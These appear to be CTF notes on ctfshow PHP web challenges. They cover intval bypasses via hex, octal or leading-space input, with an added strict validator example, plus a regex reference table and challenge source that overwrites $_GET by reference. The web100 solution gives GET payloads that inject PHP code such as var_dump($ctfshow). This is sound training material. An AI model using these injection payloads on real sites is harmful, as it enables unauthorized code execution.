01
The intval function
Bypass by passing an array
02
Convert to another base, or add a space in front.
payload
?num= 4476
?num=0x117c
?num=010574
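Why the three payloads above reach the same integer, and how a validator that parses once and compares on the parsed value treats them, as an added example that is not the challenge's source code. The function names, the `BLOCKED` constant and the sample list are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical validators, not code from the challenge.
const BLOCKED = 4476; // constructed: the value the payloads above decode to

// Weak pattern: the blocklist looks only at the raw string, while the
// consumer later calls intval($num, 0), which infers the base from the prefix.
function weak_is_blocked($num): bool {
    return $num === "4476";
}

// Hardened pattern: accept only canonical decimal, then convert.
function strict_parse($num): ?int {
    // ?num[]=1 arrives as an array; reject it before any string handling.
    if (!is_string($num)) {
        return null;
    }
    // \A and \z anchor the whole string: no whitespace, sign, 0x prefix or
    // leading zero. At most 9 digits so the value fits a 32-bit int.
    if (preg_match('/\A[1-9][0-9]{0,8}\z/', $num) !== 1) {
        return null;
    }
    return (int)$num;
}

// Blocklist decision taken on the parsed value; malformed input is rejected.
function strict_is_blocked($num): bool {
    $n = strict_parse($num);
    return $n === null || $n === BLOCKED;
}

// Constructed sample inputs: the page's payloads, the literal value, an array.
$samples = [" 4476", "0x117c", "010574", "4476", ["1"]];
foreach ($samples as $s) {
    printf(
        "%-10s intval(base 0)=%-5d weak_blocked=%-5s strict_blocked=%s\n",
        json_encode($s),
        intval($s, 0),                        // a non-empty array yields 1
        var_export(weak_is_blocked($s), true),
        var_export(strict_is_blocked($s), true)
    );
}
```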
03
Symbol | Meaning |
---|---|
[abc] | A single character: a, b or c |
[^abc] | Any single character but a, b, or c |
[a-z] | Any single character in the range a-z |
[a-zA-Z] | Any single character in the range a-z or A-Z |
^ | Start of line |
$ | End of line |
\A | Start of string |
\z | End of string |
\s | Any whitespace character |
\S | Any non-whitespace character |
\d | Any digit |
\D | Any non-digit |
\w | Any word character (letter, number, underscore) |
\W | Any non-word character |
\b | Any word boundary character |
(a\|b) | a or b |
a? | Zero or one of a |
a* | Zero or more of a |
a+ | One or more of a |
a{3} | Exactly 3 of a |
a{3,} | 3 or more of a |
a{3,6} | Between 3 and 6 of a |
. | Any single character |
(…) | Capture everything enclosed |
04
On Linux, the current directory is written as ./
05
<?php
include("flag.php");
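# If any GET parameters are present, $_GET is overwritten with $_POST
$_GET?$_GET=&$_POST:'flag';
# If the flag parameter equals 'flag', $_GET is overwritten with $_COOKIE. Here it is enough to make sure the flag parameter does not equal 'flag'
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
# If the HTTP_FLAG parameter exists and equals 'flag', the final flag is output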
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>
06
web100
$v2('ctfshow')$v3, where v2 must be the command and v3 passes the semicolon.
v0 is the AND of three values; with v2 and v3 not passed as numbers, ANDed with a numeric v1, the result is 1.
payload:
?v1=1&v2=var_dump($ctfshow)&v3=;
Or have v3 comment it out directly with an inline comment:
?v1=1&v2=var_dump($ctfshow)/*&v3=*/;